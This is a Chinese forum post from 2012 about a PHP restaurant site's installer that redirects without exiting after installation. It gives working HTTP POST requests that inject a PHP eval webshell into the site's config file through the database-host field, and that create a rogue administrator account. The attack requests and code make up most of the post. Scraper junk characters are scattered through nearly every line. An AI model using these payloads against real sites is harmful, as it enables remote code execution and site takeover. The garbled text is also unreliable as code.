问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。/ X8 |! m A* o9 Z' q. h# n$ H
7 G) Y$ \( m w: l0 @$ O) L- B" E
<?php! ^( [! N* `* R0 k9 V0 N& J2 V
if(file_exists("../install.lock"))) G; ~/ x( |" j& t( y
{
& ?3 A' W+ Y; f1 A* e0 V header("Location: ../");//没有退出
) v0 Q w- T$ j}1 I9 j% Y) w" Y' L# o
9 ?. Y9 v$ a: Q; P1 s, L$ N
//echo 'tst';exit;
. m, X5 R- [. Y6 drequire_once("init.php");
( w; c" u! g- i# bif(empty($_REQUEST['step']) || $_REQUEST['step']==1)0 k5 U# L7 C6 \/ d) u4 K' d% ?
{5 p+ r+ h9 S% I5 M' E0 A" _
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
" p9 y' [) s. P1 V5 N4 h8 A9 u" A9 ?4 g. z
1、getshell(很危险)
# `& ?& G* a% c! [+ G* `if(empty($_REQUEST['step']) || $_REQUEST['step']==1)$ h9 R7 z! N4 ]- t0 o" }# W: n
{7 S8 T& L8 p$ ]; q7 m
$smarty->assign("step",1);
' Y7 C' l' L4 [5 G0 {8 A( v4 F$smarty->display("index.html");2 n1 Y! j( C3 |: `5 X5 D
}elseif($_REQUEST['step']==2)
: e4 w8 Y* |* C, Q$ T, H{
* \0 v, T8 g; s- H0 g $mysql_host=trim($_POST['mysql_host']);
! ^/ o, y: h* ~1 r $mysql_user=trim($_POST['mysql_user']);
6 r$ j+ M- m0 u6 i* Y, [ R0 Y9 i $mysql_pwd=trim($_POST['mysql_pwd']);
4 i5 Q: M& C/ i $mysql_db=trim($_POST['mysql_db']);
, M; p' @' Q% ]% f& W6 K9 \ $tblpre=trim($_POST['tblpre']);
" y8 t+ i3 i) [; z' J( G1 Y- ? $domain==trim($_POST['domain']);
- [! {! ^- L: f5 C5 i $str="<?php \r\n";
6 e: z A) M/ c/ q# v# C' ~" F $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";$ I& n7 J, l+ t: m: R* D3 x" k0 y
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";/ R2 K! C. V6 |4 l
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";& D/ A" t. p7 X2 ]
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
! K+ N. K8 C9 {5 k; e4 [2 W3 D $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
E3 U7 P7 Y5 h* { $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
0 r; C6 e4 J- o8 o) I3 u $str.='define("DOMAIN","'.$domain.'");'."\r\n";
Y7 |& h8 R6 J) q, a: L $str.='define("SKINS","default");'."\r\n";
$ ?, ]0 {0 D: S$ p) [7 x |" u9 S2 C $str.='?>';; M4 Y+ u& M( X' u; Q
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
9 G% ~8 w2 Y) u上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马- d9 Q% F9 t9 Q! m- t) Y
POST /canting/install/index.php?m=index&step=2 HTTP/1.16 N% d; w$ ~' b" ^ Q b0 s C1 W
Host: 192.168.80.1296 f- f; |0 b) ]' W: A
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.05 R* |( h7 z8 Z( r" H9 n* L% \& S% N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
: f( b# j2 u+ q4 [7 X) FAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3$ C: E9 T6 N8 s6 [. C x
Accept-Encoding: gzip, deflate
* G3 a6 [0 H! X: M2 E9 ^Referer: http://192.168.80.129/canting/install/index.php?step=18 u! a4 U7 B5 S0 d
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42# h8 Q0 A5 _- C( ^% ^6 K! }* Q+ ^2 w
Content-Type: application/x-www-form-urlencoded
% l- s; H6 g) c L2 D3 @Content-Length: 126: I- ? u( Y( `6 D
" f( u( P' }" h$ H' k% Jmysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
+ {& P2 d' J$ q! o, |但是这个方法很危险,将导致网站无法运行。5 @7 S8 J$ I [ M) h
1 e# c, j- ^3 u, e* T- D! d" k6 @2、直接添加管理员; z J/ L/ h9 X* z1 `
* A' Y& d5 d& D# P2 J+ s; G# v
elseif($_REQUEST['step']==5)" \! U/ y% W2 V3 x* g4 O* P/ H
{2 v: p0 _- ^$ {; g+ r. T& y+ c6 A1 d/ @
if($_POST)
7 G# r% v2 ^/ _4 i! H { require_once("../config/config.inc.php");
6 T! [4 V! P; ?4 ~; }6 T $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
" n$ @! |8 V' i- a! F( e% O- U! u mysql_select_db(MYSQL_DB,$link);
3 W( `/ c/ g" v$ z* W( Q mysql_query("SET NAMES ".MYSQL_CHARSET );" P: c" c J( w4 G6 ?/ W
mysql_query("SET sql_mode=''");. ]- d0 @! h2 j7 L
1 @# T5 z- }+ K1 h% D $adminname=trim($_POST['adminname']);
) Q$ h6 m: z, r0 c+ z+ K8 {7 U$ n" @ $pwd1=trim($_POST['pwd1']);
9 r0 q$ m, a5 Y- c D! V6 j3 ? $pwd2=trim($_POST['pwd2']);* h* i: P# S6 H' P1 ~
if(empty($adminname))
% e0 J$ I: W8 v8 K: G) L {
0 \% ~3 ]/ I* |, H
" X6 \! M v3 b: Q. j& s echo "<script>alert('管理员不能为空');history.go(-1);</script>";
2 `- `6 X# } N! }) [& b4 u) j exit();
. a% g! |6 `1 [) G) y }
8 W" Q9 L; k: t2 z7 B2 u if(($pwd1!=$pwd2) or empty($pwd1))
$ D- C* U' `% [" d: _, r' s {
$ \4 ?6 j9 {2 @0 A2 o4 ^: N ] echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
8 t% W! G( G( I9 S7 m" n8 q }
1 p% f8 V! T- w mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
7 R$ ~% i" t7 K, v$ j" s }
8 F& j, A0 U/ z5 ~, d' [4 k这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
" I' Z6 i/ ]0 X5 CPOST /canting/install/index.php?m=index&step=5 HTTP/1.13 Y q* l% {' x1 x4 i0 K
Host: 192.168.80.129
- z( O' O" |! q3 n" B( y0 W; iUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
& @0 c8 U. d5 W) dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
$ Z4 J+ \+ Q( B3 {Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
$ k* h ?& @" @3 Y X" t1 S# H9 m0 mAccept-Encoding: gzip, deflate
) ?; t; W7 D: B, }8 K, ]Referer: http://www.2cto.com /canting/install/index.php?step=11 d# q" R) s( B4 b% s4 [
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
0 y6 ]+ L% A& S0 k, lContent-Type: application/x-www-form-urlencoded# n7 t! I" K/ @, o7 B9 V# \
Content-Length: 467 B2 M1 \# M- a" l% l
4 Z5 r S: W' q* W* p6 s* F5 Kadminname=qingshen&pwd1=qingshen&pwd2=qingshen
0 \ P- X) E; B% g8 m. k |
发表于 2012-12-4 11:13:44
收藏
支持
反对